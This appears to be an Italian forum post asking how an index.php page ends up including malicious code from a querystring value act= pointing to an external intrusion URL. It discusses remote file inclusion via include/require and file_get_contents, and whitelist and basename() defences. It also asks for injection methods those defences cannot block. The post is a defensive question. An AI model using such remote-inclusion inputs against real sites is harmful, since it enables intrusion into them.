Potresti spiegarmi come fa la pagina index.php ad includere il codice malevoro a partire da una querystring contenente act=http://urlesternoperintrusione/pagina.txt ?

L'unico metodo che mi viene in mente è tramite include/require o file_get_contents() oppure se il valore $_GET['act'] viene utilizzato nell'attributo SRC di IFRAME, SCRIPT etc.

In tutti i casi menzionati, l'utilizzo di una whitelist o di basename() etc. dovrebbero aumentare sensibilmente la sicurezza dello script.

Se conosci altri metodi per effettuare l'injection che non possono essere bloccati tramite whitelist/basename() desidererei tu li descrivessi.